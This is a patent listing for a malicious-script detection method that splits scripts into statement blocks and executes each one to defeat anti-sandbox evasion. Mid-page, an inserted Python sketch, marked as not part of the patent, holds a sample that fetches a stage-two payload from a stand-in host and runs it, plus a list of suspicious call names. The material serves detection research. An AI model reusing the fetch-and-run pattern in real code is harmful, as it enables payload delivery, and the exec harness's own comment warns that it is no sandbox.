CN110119618A - Malicious script detection method and device - Google Patents

Publication number: CN110119618A
Authority: CN (China)
Prior art keywords: script, malicious, processing, measured, dynamic
Legal status: Granted, active
Application number: CN201811291818.8A
Other languages: Chinese (zh)
Other versions: CN110119618B (en)
Inventors: 李石磊, 王春秋, 童志明, 何公道
Current assignee: Antiy Technology Group Co Ltd
Original assignee: Harbin Antiy Technology Co Ltd
Application filed by: Harbin Antiy Technology Co Ltd
Priority to: CN201811291818.8A

Classifications

    • G: PHYSICS
    • G06: COMPUTING; CALCULATING OR COUNTING
    • G06F: ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00: Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50: Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55: Detecting local intrusion or implementing counter-measures
    • G06F21/56: Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562: Static detection
    • G06F21/566: Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities


Abstract

The invention discloses a method and device for detecting malicious scripts. The method comprises the following steps: obtaining a script under test, and obtaining multiple logical blocks of the script under test through lexical and syntactic analysis; performing dynamic processing on each of the multiple logical blocks, and obtaining a processing result for each logical block; and obtaining a malicious-detection result for the script under test according to the processing result of each logical block. The method allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.

Description

Malicious script detection method and device
Technical field
The present invention relates to the technical field of computer network security, and in particular to a method and device for detecting malicious scripts.
Background
In the related art, dynamic detection of malicious code judges the malicious behavior that the code exhibits when it is executed in a virtual environment.
However, some malicious scripts bypass execution of their malicious code through anti-sandbox techniques such as delays or checks of the current time, and others use encryption, compression, obfuscation and similar means to hide the malicious behavior of the script and lengthen the analyst's analysis cycle. Because the actual malicious code is never executed, the malicious behavior cannot be detected effectively. In the related art, therefore, a malicious script that does not execute its actual malicious code often cannot be detected effectively, so the real malicious behavior of the script often goes undetected, the accuracy and reliability of detection are poor, and attacks by malicious scripts often cannot be avoided effectively, which greatly degrades the user experience. This problem urgently needs to be solved.
Summary of the invention
The present invention aims to solve, at least to some extent, one of the technical problems in the related art.
To this end, the first object of the present invention is to propose a method for detecting malicious scripts.
The second object of the present invention is to propose a device for detecting malicious scripts.
The third object of the present invention is to propose a computer device.
The fourth object of the present invention is to propose a non-transitory computer-readable storage medium.
The fifth object of the present invention is to propose a computer program product.
To achieve the above objects, an embodiment of the first aspect of the present invention proposes a method for detecting malicious scripts, comprising the following steps: obtaining a script under test, and obtaining multiple logical blocks of the script under test through lexical and syntactic analysis; performing dynamic processing on each of the multiple logical blocks, and obtaining a processing result for each logical block; and obtaining a malicious-detection result for the script under test according to the processing result of each logical block.
The method for detecting malicious scripts of the embodiment of the present invention allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.
In addition, the method for detecting malicious scripts according to the above embodiment of the present invention may also have the following additional technical features:
Further, in one embodiment of the present invention, obtaining the multiple logical blocks of the script under test through lexical and syntactic analysis further comprises: using lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into the multiple logical blocks.
Further, in one embodiment of the present invention, the method further comprises: saving the processing result of each logical block.
Further, in one embodiment of the present invention, performing dynamic processing on each of the multiple logical blocks comprises: calling a dynamic processing interface, and passing the multiple logical blocks in one after another for dynamic processing.
To achieve the above objects, an embodiment of the second aspect of the present invention proposes a device for detecting malicious scripts, comprising: a first obtaining module, configured to obtain a script under test and to obtain multiple logical blocks of the script under test through lexical and syntactic analysis; a processing module, configured to perform dynamic processing on each of the multiple logical blocks and to obtain a processing result for each logical block; and a second obtaining module, configured to obtain a malicious-detection result for the script under test according to the processing result of each logical block.
The device for detecting malicious scripts of the embodiment of the present invention allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.
In addition, the device for detecting malicious scripts according to the above embodiment of the present invention may also have the following additional technical features:
Further, in one embodiment of the present invention, the first obtaining module is further configured to use lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into the multiple logical blocks; and the processing module is further configured to call a dynamic processing interface and pass the multiple logical blocks in one after another for dynamic processing.
Further, in one embodiment of the present invention, the device further comprises: a saving module, configured to save the processing result of each logical block.
To achieve the above objects, an embodiment of the third aspect of the present invention proposes a computer device, comprising a memory, a processor, and a computer program stored in the memory and runnable on the processor, wherein the processor, when executing the program, implements the malicious code dynamic detection method of the above embodiment.
To achieve the above objects, an embodiment of the fourth aspect of the present invention proposes a non-transitory computer-readable storage medium on which a computer program is stored, wherein the program, when executed by a processor, implements the malicious code dynamic detection method of the above embodiment.
To achieve the above objects, an embodiment of the fifth aspect of the present invention proposes a computer program product, wherein, when the instructions in the computer program product are executed by a processor, the malicious code dynamic detection method of the above embodiment is performed.
Additional aspects and advantages of the present invention will be set forth in part in the following description, and in part will become apparent from the following description or be learned through practice of the present invention.
Brief description of the drawings
The above and/or additional aspects and advantages of the present invention will become apparent and easy to understand from the following description of the embodiments taken together with the accompanying drawings, in which:
Fig. 1 is a flowchart of the method for detecting malicious scripts according to one embodiment of the present invention;
Fig. 2 is a flowchart of the method for detecting malicious scripts according to a specific embodiment of the present invention;
Fig. 3 is a structural schematic diagram of the device for detecting malicious scripts according to one embodiment of the present invention.
Detailed description
Embodiments of the present invention are described in detail below, and examples of the embodiments are shown in the accompanying drawings, in which the same or similar reference numerals throughout denote the same or similar elements or elements having the same or similar functions. The embodiments described below with reference to the drawings are exemplary and are intended to explain the present invention; they should not be construed as limiting it.
The method and device for detecting malicious scripts proposed according to the embodiments of the present invention are described below with reference to the drawings. The method is described first.
Fig. 1 is a flowchart of the method for detecting malicious scripts of one embodiment of the present invention.
As shown in Fig. 1, the method for detecting malicious scripts comprises the following steps:
In step S101, a script under test is obtained, and multiple logical blocks of the script under test are obtained through lexical and syntactic analysis.
That is, as shown in Fig. 2, the embodiment of the present invention first obtains the script to be detected, and performs static logical-block preprocessing on it by means such as lexical and syntactic analysis.
It should be noted that the embodiment of the present invention performs static logical-block preprocessing on the script to be detected. The purpose of the blocking is to eliminate the influence that all the logic judgments and function calls in the script have on the subsequent dynamic processing result. In other words, static logical-block preprocessing effectively removes that influence, which improves the ability to capture dynamic behavior and the accuracy of doing so.
Further, in one embodiment of the present invention, obtaining the multiple logical blocks of the script under test through lexical and syntactic analysis further comprises: using lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into multiple logical blocks.
That is, the blocking method uses lexical and syntactic analysis to treat each minimal statement unit in the script that can be executed on its own as one logical block (for example, the statements inside an if/else are split out so that they execute unconditionally).
In step S102, dynamic processing is performed on each of the multiple logical blocks, and a processing result is obtained for each logical block.
That is, the embodiment of the present invention sends the multiple logical blocks to a dynamic detection module, and the dynamic detection module performs dynamic processing on the logical blocks it receives.
Further, in one embodiment of the present invention, performing dynamic processing on each of the multiple logical blocks comprises: calling a dynamic processing interface, and passing the multiple logical blocks in one after another for dynamic processing.
That is, the embodiment of the present invention calls the dynamic processing interface and passes the split logical blocks in one after another for dynamic processing, obtaining a processing result for each logical block. In this way, when an error occurs while one block is being dynamically processed, the dynamic processing of subsequent blocks is not affected, and as much code as possible is executed, which improves the ability to capture the dynamic behavior of malicious code.
Further, in one embodiment of the present invention, the method of the embodiment further comprises: saving the processing result of each logical block.
That is, as shown in Fig. 2, the embodiment of the present invention may save the processing result obtained after each block is dynamically processed.
In step S103, the malicious-detection result for the script under test is obtained according to the processing result of each logical block.
For example, the overwhelming majority of malicious scripts to be detected have been compressed, encrypted, obfuscated and so on. If detection follows the traditional dynamic detection approach, then when a script bypasses execution of its malicious code through anti-sandbox techniques such as delays or checks of the current time, the malicious behavior of the script cannot actually be detected. The embodiment of the present invention therefore adds a static logical-block preprocessing function before the script to be detected is dynamically processed, so that every statement that can be executed on its own is executed during dynamic processing, which effectively improves the ability to capture the dynamic behavior of malicious code and the accuracy of doing so.
Specifically, in one specific embodiment of the present invention, as shown in Fig. 2, the method of the embodiment comprises the following steps:
Step S201: start.
Step S202: the script to be detected.
That is, the script under test is obtained, and the method proceeds to step S203.
Step S203: static logical blocking.
Specifically, static logical-block preprocessing is performed on the script to be detected by means such as lexical and syntactic analysis, which eliminates the influence that all the logic judgments and function calls in the script have on the subsequent dynamic processing result.
In an embodiment of the present invention, a static logical-block preprocessing function is added so that every statement that can be executed on its own is executed during dynamic processing, which effectively improves the ability to capture the dynamic behavior of malicious code and the accuracy of doing so.
Step S204: dynamic processing.
After static logical-block preprocessing, the split logical blocks are passed in one after another for dynamic processing, yielding a processing result for each logical block. When an error occurs while one block is being dynamically processed, the dynamic processing of subsequent blocks is not affected, so more code is effectively executed, which improves the ability to capture the dynamic behavior of malicious code.
Step S205: save the processing result of each block.
Step S206: obtain the malicious-detection result according to the processing result of each block.
In short, if detection follows the dynamic detection approach of the related art, then when a script bypasses execution of its malicious code through anti-sandbox techniques such as delays or checks of the current time, the malicious behavior of the script cannot actually be detected. The embodiment of the present invention, however, adds a static logical-block preprocessing function before the script to be detected is dynamically processed, so that every statement that can be executed on its own is executed during dynamic processing, and calls the dynamic processing interface, passing the split logical blocks in one after another for dynamic processing, to obtain a processing result for each logical block.
Step S207: end.
The embodiment of the present invention allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts, so that the real malicious behavior of a malicious script is detected effectively and attacks by malicious scripts are avoided.
The method for detecting malicious scripts proposed according to the embodiments of the present invention adds a logical-block preprocessing function on top of static detection and combines it with dynamic processing. This allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the ability to capture the dynamic behavior of malicious code and the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.
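The flow of steps S202 to S206, as an added sketch that is not code from the patent: Python's `ast` module stands in for the lexical and syntactic analysis, and a set of recording stubs stands in for the dynamic processing interface. The emulated names `fetch`, `run` and `write_file`, the `SUSPICIOUS` set and the sample script are all constructed for illustration.

```python
import ast  # ast.unparse needs Python 3.9+

# Constructed sample: the interesting calls sit behind a delay and a clock check,
# and an undefined helper raises before the final statement.
SAMPLE = '''\
import time
time.sleep(3600)
if time.localtime().tm_year == 2030:
    data = fetch("http://example.invalid/stage2")
    run(data)
else:
    print("idle")
unpack_helper()
write_file("out.tmp", data)
'''

EMULATED = ("fetch", "run", "write_file", "print")   # hypothetical emulator API
SUSPICIOUS = {"fetch", "run", "write_file"}          # hypothetical verdict rule


class Stub:
    """Stand-in for an emulated module or function: records calls, does nothing."""

    def __init__(self, name, log):
        self._name, self._log = name, log

    def __getattr__(self, attr):            # time.sleep -> Stub("time.sleep")
        return Stub(f"{self._name}.{attr}", self._log)

    def __call__(self, *args, **kwargs):    # record the call instead of performing it
        self._log.append((self._name, args))
        return Stub(f"{self._name}()", self._log)


def partition(source):
    """S203: split a script into its minimal independently executable statements.

    Compound statements (if/else, loops, try, with, def) are replaced by the
    statements they contain, so conditions no longer gate execution.
    """
    blocks = []

    def walk(stmts):
        for node in stmts:
            inner = []
            for field in ("body", "orelse", "finalbody"):
                inner += getattr(node, field, [])
            for handler in getattr(node, "handlers", []):
                inner += handler.body
            if inner:
                walk(inner)
            else:
                blocks.append(ast.unparse(node))

    walk(ast.parse(source).body)
    return blocks


def process(blocks):
    """S204/S205: run blocks one after another and save a result for each.

    Replacing the builtins is NOT an isolation boundary; a real dynamic
    processing interface would be an emulator or sandbox. Only the constructed
    sample above is executed here, and every name it reaches is a Stub.
    """
    log = []
    env = {name: Stub(name, log) for name in EMULATED}
    env["__builtins__"] = {"__import__": lambda name, *a, **k: Stub(name, log)}
    results = []
    for src in blocks:
        start, error = len(log), None
        try:
            exec(compile(src, "<block>", "exec"), env)
        except Exception as exc:            # an error in one block must not stop the rest
            error = type(exc).__name__
        calls = [name for name, _ in log[start:]]
        results.append({"block": src, "calls": calls, "error": error})
    return results


def verdict(results):
    """S206: derive the detection result from the saved per-block results."""
    seen = {call for r in results for call in r["calls"]}
    hits = sorted(seen & SUSPICIOUS)
    return {"malicious": bool(hits), "behaviours": hits}


if __name__ == "__main__":
    print("whole script:", verdict(process([SAMPLE])))
    for result in process(partition(SAMPLE)):
        print(result)
    print("per block:   ", verdict(process(partition(SAMPLE))))
```

Processed as a single block, the sample records only the delay, the clock check and the `print` before the undefined helper aborts it; processed block by block, `fetch`, `run` and `write_file` are all recorded and the failing block is isolated.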
The device for detecting malicious scripts proposed according to the embodiments of the present invention is described next with reference to the drawings.
Fig. 3 is a structural schematic diagram of the device for detecting malicious scripts of one embodiment of the present invention.
As shown in Fig. 3, the device 10 for detecting malicious scripts comprises: a first obtaining module 100, a processing module 200 and a second obtaining module 300.
The first obtaining module 100 is configured to obtain a script under test and to obtain multiple logical blocks of the script under test through lexical and syntactic analysis. The processing module 200 is configured to perform dynamic processing on each of the multiple logical blocks and to obtain a processing result for each logical block. The second obtaining module 300 is configured to obtain the malicious-detection result for the script under test according to the processing result of each logical block. The device 10 of the embodiment of the present invention allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.
Further, in one embodiment of the present invention, the first obtaining module 100 is further configured to use lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into multiple logical blocks; and the processing module is further configured to call a dynamic processing interface and pass the multiple logical blocks in one after another for dynamic processing.
Further, in one embodiment of the present invention, the device 10 of the embodiment further comprises a saving module. The saving module is configured to save the processing result of each logical block.
It should be noted that the foregoing explanation of the method embodiment for detecting malicious scripts also applies to the device for detecting malicious scripts of this embodiment, and is not repeated here.
The device for detecting malicious scripts proposed according to the embodiments of the present invention adds a logical-block preprocessing function on top of static detection and combines it with dynamic processing. This allows malicious code to be executed unconditionally during dynamic detection, detects the real malicious behavior of a malicious script quickly and accurately, and achieves effective detection of malicious scripts. It thereby effectively improves the ability to capture the dynamic behavior of malicious code and the accuracy and reliability of detection, so that users can avoid attacks by malicious scripts, and improves the user experience.
In addition, an embodiment of the present invention also proposes a computer device, comprising a memory, a processor, and a computer program stored in the memory and runnable on the processor, wherein the processor, when executing the program, implements the malicious code dynamic detection method of the above embodiment.
In addition, an embodiment of the present invention also proposes a non-transitory computer-readable storage medium on which a computer program is stored, wherein the program, when executed by a processor, implements the malicious code dynamic detection method of the above embodiment.
In addition, an embodiment of the present invention also proposes a computer program product, wherein, when the instructions in the computer program product are executed by a processor, the malicious code dynamic detection method of the above embodiment is performed.
In addition, the terms "first" and "second" are used for descriptive purposes only and are not to be understood as indicating or implying relative importance or as implicitly indicating the number of the technical features referred to. A feature defined as "first" or "second" may therefore explicitly or implicitly include at least one such feature. In the description of the present invention, "multiple" means at least two, for example two or three, unless specifically defined otherwise.
In the description of this specification, a description that refers to the terms "one embodiment", "some embodiments", "example", "specific example" or "some examples" means that a specific feature, structure, material or characteristic described in connection with that embodiment or example is included in at least one embodiment or example of the present invention. In this specification, schematic uses of these terms do not necessarily refer to the same embodiment or example. Moreover, the specific features, structures, materials or characteristics described may be combined in any suitable manner in any one or more embodiments or examples. In addition, provided they do not conflict with each other, those skilled in the art may combine the different embodiments or examples described in this specification and the features of those different embodiments or examples.
Although embodiments of the present invention have been shown and described above, it is to be understood that the above embodiments are exemplary and are not to be construed as limiting the present invention, and that those skilled in the art may change, modify, replace and vary the above embodiments within the scope of the present invention.

Claims (10)

1. A method for detecting malicious scripts, characterized by comprising the following steps:
obtaining a script under test, and obtaining multiple logical blocks of the script under test through lexical and syntactic analysis;
performing dynamic processing on each of the multiple logical blocks, and obtaining a processing result for each logical block; and
obtaining a malicious-detection result for the script under test according to the processing result of each logical block.
2. The malicious code dynamic detection method according to claim 1, characterized in that obtaining the multiple logical blocks of the script under test through lexical and syntactic analysis further comprises:
using lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into the multiple logical blocks.
3. The malicious code dynamic detection method according to claim 1, characterized by further comprising:
saving the processing result of each logical block.
4. The malicious code dynamic detection method according to claim 1, characterized in that performing dynamic processing on each of the multiple logical blocks comprises: calling a dynamic processing interface, and passing the multiple logical blocks in one after another for dynamic processing.
5. A device for detecting malicious scripts, characterized by comprising:
a first obtaining module, configured to obtain a script under test and to obtain multiple logical blocks of the script under test through lexical and syntactic analysis;
a processing module, configured to perform dynamic processing on each of the multiple logical blocks and to obtain a processing result for each logical block; and
a second obtaining module, configured to obtain a malicious-detection result for the script under test according to the processing result of each logical block.
6. The malicious code dynamic detection device according to claim 5, characterized in that:
the first obtaining module is further configured to use lexical and syntactic analysis to treat each minimal statement unit of the script under test that can be executed on its own as one logical block, so that the script is split into the multiple logical blocks; and
the processing module is further configured to call a dynamic processing interface and pass the multiple logical blocks in one after another for dynamic processing.
7. The malicious code dynamic detection device according to claim 5, characterized by further comprising:
a saving module, configured to save the processing result of each logical block.
8. A computer device, characterized by comprising a memory, a processor, and a computer program stored in the memory and runnable on the processor, wherein the processor, when executing the program, implements the malicious code dynamic detection method according to any one of claims 1-4.
9. A non-transitory computer-readable storage medium on which a computer program is stored, characterized in that the program, when executed by a processor, implements the malicious code dynamic detection method according to any one of claims 1-4.
10. A computer program product, characterized in that, when the instructions in the computer program product are executed by a processor, the malicious code dynamic detection method according to any one of claims 1-4 is performed.
CN201811291818.8A 2018-10-31 2018-10-31 Malicious script detection method and device Active CN110119618B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811291818.8A CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201811291818.8A CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Publications (2)

Publication Number Publication Date
CN110119618A true CN110119618A (en) 2019-08-13
CN110119618B CN110119618B (en) 2021-05-04

Family

ID=67519717

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811291818.8A Active CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Country Status (1)

Country Link
CN (1) CN110119618B (en)

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101799855A (en) * 2010-03-12 2010-08-11 北京大学 Simulated webpage Trojan detecting method based on ActiveX component
US20110239294A1 (en) * 2010-03-29 2011-09-29 Electronics And Telecommunications Research Institute System and method for detecting malicious script
CN103559441A (en) * 2013-10-28 2014-02-05 中国科学院信息工程研究所 Cross-platform detection method and system for malicious files in cloud environment
CN104333558A (en) * 2014-11-17 2015-02-04 广州华多网络科技有限公司 Website detection method and device
WO2018131199A1 (en) * 2017-01-11 2018-07-19 日本電信電話株式会社 Combining device, combining method and combining program

Also Published As

Publication number Publication date
CN110119618B (en) 2021-05-04

Similar Documents

Publication Publication Date Title
KR102306568B1 (en) Processor trace-based enforcement of control flow integrity in computer systems
CN106682505B (en) Virus detection method, terminal, server and system
US9189365B2 (en) Hardware-assisted program trace collection with selectable call-signature capture
CN109711172A (en) Data prevention method and device
CN104462962B (en) Method for detecting unknown malicious code and binary vulnerabilities
US8627478B2 (en) Method and apparatus for inspecting non-portable executable files
CN104967630B (en) The processing method and processing device of web access requests
CN105868630A (en) Malicious PDF document detection method
CN107315961B (en) Program vulnerability detection method and device, computing equipment and storage medium
CN106951780A (en) Static detection method and device for repackaged malicious applications
CN106599688A (en) Application category-based Android malicious software detection method
CN108399336B (en) Detection method and device for malicious behaviors of android application
CN106096391A (en) Process control method and user terminal
CN103294951A (en) Malicious code sample extraction method and system based on document type bug
CN105740711A (en) Malicious code detection method and system based on kernel object behavior body
Sadeghi et al. Mining the categorized software repositories to improve the analysis of security vulnerabilities
CN105488414A (en) Method and system for preventing malicious codes from detecting virtual environments
CN106228065B (en) Method and device for positioning buffer overflow vulnerability
CN111291377A (en) Application vulnerability detection method and system
CN110119618A (en) The detection method and device of malicious script
US8762953B2 (en) Exception-based error handling in an array-based language
CN106301974A (en) Website backdoor detection method and device
US20140026216A1 (en) System, method, and computer program product for detecting unwanted data based on scanning associated with a payload execution and a behavioral analysis
US20190213323A1 (en) Systems and methods for detecting and mitigating code injection attacks
US20220138311A1 (en) Systems and methods for detecting and mitigating code injection attacks

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
CB02 Change of applicant information

Address after: 150028 Building 7, Innovation Plaza, Science and Technology Innovation City, Harbin Hi-tech Industrial Development Zone, Harbin, Heilongjiang Province (838 Shikun Road)

Applicant after: Harbin Antiy Technology Group Limited by Share Ltd

Address before: Room 506, Room 162, Hongqi Street, No. 17 Building, Nangang, High-tech Venture Center, Harbin High-tech Industrial Development Zone, Heilongjiang Province, 150000

Applicant before: Harbin Antiy Technology Co., Ltd.

GR01 Patent grant
CP01 Change in the name or title of a patent holder

Address after: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road)

Patentee after: Antan Technology Group Co.,Ltd.

Address before: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road)

Patentee before: Harbin Antian Science and Technology Group Co.,Ltd.